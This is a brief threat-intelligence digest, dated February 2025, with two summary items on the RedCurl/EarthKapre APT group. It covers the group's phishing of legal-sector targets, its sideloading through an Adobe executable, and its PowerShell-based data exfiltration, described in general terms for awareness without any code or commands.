2025-02-22 21:39:09 Pacfic
RedCurl APT Targets Legal Sector using Adobe Executable - 4d
The RedCurl/EarthKapre APT group has been actively targeting organizations, particularly those in the legal sector, for corporate espionage. The group uses sophisticated techniques, including Indeed-themed phishing emails, to gain initial access. A legitimate Adobe executable is then used to sideload the EarthKapre/RedCurl loader, which exfiltrates data through Cloudflare Workers for command and control. The attackers leverage reconnaissance tools to gather information about the target environment before deploying their loader and exfiltrating sensitive data.
RedCurl APT Abuses PowerShell for Data Exfiltration - 4d
The RedCurl APT is actively abusing PowerShell for data collection and exfiltration. The attackers are using 7-Zip to archive collected data and exfiltrating it via PowerShell using MSXML2.ServerXMLHTTP and ADODB.Stream. These techniques allow them to gather and steal sensitive information from compromised systems.